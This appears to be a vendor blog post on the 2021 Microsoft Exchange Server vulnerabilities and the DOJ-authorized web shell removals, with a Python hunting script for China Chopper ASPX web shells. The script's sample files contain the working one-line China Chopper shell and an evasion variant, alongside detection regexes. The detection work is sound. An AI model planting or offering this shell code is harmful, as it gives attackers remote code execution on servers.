Countering Microsoft Exchange Vulnerabilities: DOJ Authorizes Warrant to Address Cybercrime Against Americans
Federal Government Moving Quickly to Respond to Emerging Threats to Vital Digital Infrastructure
- MAR-10331466-1.v1: China Chopper Webshell identifies a China Chopper web shell observed on compromised Microsoft Exchange servers. After exploiting a Microsoft Exchange Server vulnerability for initial access, a malicious cyber actor can upload a web shell to enable remote administration of the affected system.
- MAR-10330097-1.v1: DearCry Ransomware identifies ransomware that has been deployed on compromised on-premises Exchange servers. The malware encrypts files on a device and demands a ransom in exchange for decryption.
- CISA web page Remediating Microsoft Exchange Vulnerabilities
- CISA web page Ransomware Guidance and Resources
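The MAR above describes the China Chopper web shell that was dropped after exploitation; the check a responder wants is a hunt for it across the Exchange web roots. The following is an added example written for this page, not code from CISA, Microsoft, or the MAR. It matches the publicly documented one-line ASPX form of China Chopper (a JScript page passing a request parameter to eval with the "unsafe" flag) and the drop directories named in public reporting. The default install paths, the file names, and the sample file contents are all constructed assumptions for the example.

```python
"""Hunt for China Chopper-style ASPX web shells under an Exchange server's web roots."""
import os
import re
from dataclasses import dataclass
from typing import Dict, List

# Directories where dropped ASPX shells were reported during the 2021 campaign.
# Assumption: a default C: install; adjust for non-default install locations.
EXCHANGE_WEB_ROOTS = (
    r"c:\inetpub\wwwroot\aspnet_client",
    r"c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth",
    r"c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth",
)

# Signatures for the one-line China Chopper ASPX shell. Whitespace and case are
# tolerated because trivial reformatting is a cheap evasion.
SIGNATURES = {
    # The core construct: a request parameter handed straight to eval(..., "unsafe").
    "chopper_eval_unsafe": re.compile(
        r'eval\s*\(\s*Request\.Item\s*\[\s*["\'][^"\']+["\']\s*\]\s*,\s*["\']unsafe["\']\s*\)',
        re.IGNORECASE,
    ),
    # Exchange's own OWA/ECP pages are C#; a JScript page directive in these
    # directories is anomalous by itself and is kept as a weaker indicator.
    "jscript_page_directive": re.compile(
        r'<%@\s*Page\s+Language\s*=\s*["\']JScript["\']', re.IGNORECASE
    ),
}


@dataclass(frozen=True)
class Finding:
    path: str
    rule: str
    in_exchange_webroot: bool
    snippet: str


def in_exchange_webroot(path: str) -> bool:
    """True when the file sits under one of the known drop directories."""
    normalized = path.replace("/", "\\").lower()
    return normalized.startswith(EXCHANGE_WEB_ROOTS)


def scan_text(path: str, content: str) -> List[Finding]:
    """Apply every signature to one file's content and report each hit."""
    hits: List[Finding] = []
    for rule, pattern in SIGNATURES.items():
        match = pattern.search(content)
        if match:
            hits.append(Finding(path, rule, in_exchange_webroot(path), match.group(0)[:80]))
    return hits


def scan_directory(root: str) -> List[Finding]:
    """Walk a web root on a live server; .aspx/.ashx/.asmx are the IIS-executable types."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith((".aspx", ".ashx", ".asmx")):
                full = os.path.join(dirpath, name)
                with open(full, "r", encoding="utf-8", errors="ignore") as fh:
                    findings.extend(scan_text(full, fh.read()))
    return findings


# Constructed sample files (not artifacts from any real incident).
SAMPLE_FILES: Dict[str, str] = {
    # The documented one-line China Chopper ASPX form, dropped under the OWA auth directory.
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\web.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    # The same shell with whitespace and case changed to dodge exact-string matching.
    r"C:\inetpub\wwwroot\aspnet_client\system_web\log.aspx":
        '<%@ page language = "JScript" %>\r\n<% EVAL ( Request.Item [ \'x\' ] , "UNSAFE" ) ; %>',
    # A benign C# page that must not be flagged.
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx":
        '<%@ Page Language="C#" AutoEventWireup="true" %>\r\n<html><body>Logon</body></html>',
}


def scan_samples() -> List[Finding]:
    """Run the signatures over the constructed samples (offline demonstration)."""
    findings: List[Finding] = []
    for path, content in SAMPLE_FILES.items():
        findings.extend(scan_text(path, content))
    return findings


if __name__ == "__main__":
    for finding in scan_samples():
        flag = "HIGH" if finding.in_exchange_webroot else "review"
        print(f"[{flag}] {finding.rule}: {finding.path} :: {finding.snippet}")
```

On a real server, point scan_directory at each Exchange web root and treat any hit as a confirmed compromise rather than a suspicious file: the shell itself is only the foothold, so the server's IIS logs, scheduled tasks and accounts should be reviewed next. The signatures are deliberately narrow to avoid noise on Exchange's own pages; they will miss heavily obfuscated or rewritten shells, so a signature miss is not a clean bill of health.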

The 2021 Microsoft Exchange Vulnerabilities: What Happened and Why It Matters For Your Organization
Microsoft Exchange Server vulnerabilities have been a central cybersecurity topic since the security firm Volexity detected anomalous, potentially malicious activity on two of its customers' on-premises Microsoft Exchange servers on January 3, 2021. On March 2, 2021, Microsoft confirmed that zero-day vulnerabilities in on-premises Exchange Server were being exploited in the wild and released out-of-band patches. By March 9, 2021, more than 250,000 organizations worldwide had reportedly been affected in the fallout from the vulnerabilities first observed in January. In March, Microsoft published mitigation guidance for Exchange Server and released a one-click mitigation tool. After the initial January 2021 compromises, state-sponsored and criminal groups including HAFNIUM, Winnti Group, Calypso, Tick, and LuckyMouse (APT27) capitalized on the moment to deploy a series of crimeware variants, including previously unknown ransomware families. The attacks were not limited to private companies; public bodies such as the European Banking Authority, the Norwegian Parliament, and the Chilean Commission for Financial Markets (CMF) were also affected. The most recent Exchange vulnerabilities were identified by the NSA and classified by CISA; in parallel, the DOJ obtained a warrant under which the FBI directly removed web shells from compromised servers. Unlike the earlier vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, these newer vulnerabilities had not been observed under exploitation by advanced persistent threat (APT) actors; federal action of this magnitude nonetheless signals the pervasive threat these potential exploit vectors posed to U.S. national interests.
“Today’s court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” said Assistant Attorney General John C. Demers for the Justice Department’s National Security Division. “Combined with the private sector’s and other government agencies’ efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country’s cybersecurity. There’s no doubt that more work remains to be done, but let there also be no doubt that the Department is committed to playing its integral and necessary role in such efforts.”

How Should Organizations Respond to the 2021 Microsoft Exchange Data Breach and Vulnerabilities?
Any organization running on-premises Microsoft Exchange servers should immediately apply the security updates that address the vulnerabilities discovered in January. The most recent Exchange vulnerabilities uncovered by the NSA have not been observed in exploitation attempts, but they should be patched just as promptly. Note that applying updates closes the vulnerability but does not remove a web shell already placed on a server; any server that was exposed before patching should also be checked for the post-compromise artifacts described in the MARs above. Organizations seeking more information about this ongoing and evolving event should review the following resources:
- Microsoft April 2021 Security Update Summary and deployment information
- CISA ED 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities, Supplemental Direction V2
- CISA Alert AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities
- CISA web page: Remediating Microsoft Exchange Vulnerabilities
Geopolitical Implications of Government Actions Against Microsoft Exchange Vulnerabilities
This latest cyber threat event involving Microsoft Exchange has a variety of geopolitical implications, because many of the actors connected to ongoing exploitation attempts have been attributed to threat groups based in China, among other nations with adversarial relationships to U.S. national interests. The Computer Crime and Intellectual Property Section of the United States Department of Justice has been very active over the last few years and has taken many actions toward prosecuting foreign nationals involved in cybercrime against the United States. Deputy National Security Advisor for Cyber and Emerging Technologies Anne Neuberger released the following statement outlining the U.S. government’s commitment to countering cyberespionage and cyberwarfare attempts against U.S. citizens:

“Cybersecurity is a top priority for the Biden Administration, and we’re committed to sharing actionable and timely information to help the American public operate safely online. Microsoft released a set of Exchange patches today that are critical. We urge all owners and operators of Microsoft Exchange Servers to apply these latest patches immediately. The U.S. Government will lead by example – we require all agencies to patch their Exchange servers immediately. Should these vulnerabilities evolve into a major incident, we will manage the incident in partnership with the private sector, building on the Unified Coordination Group processes established and exercised in the recent Microsoft Exchange incident. The U.S. government discovered and notified Microsoft of these vulnerabilities. The U.S. Government carefully weighs the national security, public, and commercial interests in deciding to disclose a vulnerability. Moreover, we recognize when vulnerabilities may pose such a systemic risk that they require expedited disclosure. This disclosure is an example of the responsible and transparent approach the U.S. government uses when handling vulnerabilities. This is consistent with our expectations for how responsible governments and companies can work together to promote cybersecurity.”

Coordination is Key to Developing a Resilient Cybersecurity Posture
Protecting mission-critical digital infrastructure has far-reaching implications. In light of recent data breaches, ransomware attacks, and ongoing exploit attempts against public and private sector organizations, it’s clear that it is time for organizations worldwide to adopt a more resilient cybersecurity posture. Building agile and responsive cybersecurity threat response capabilities means developing partnerships with expert analysts and proprietary technologies that go further and see farther. Gradient is your trusted cybersecurity partner. Our platform is your best resource for understanding and better responding to the emerging cyber threats of the day with the expertise of a true information security expert. Our team of analysts and cybersecurity professionals becomes an extension of your IT capabilities and the foundation of a resilient and responsive cybersecurity posture. Don’t wait until it's too late and your organization is targeted. Respond to emerging threats now. Schedule a demo today to learn more about the next generation of cybersecurity.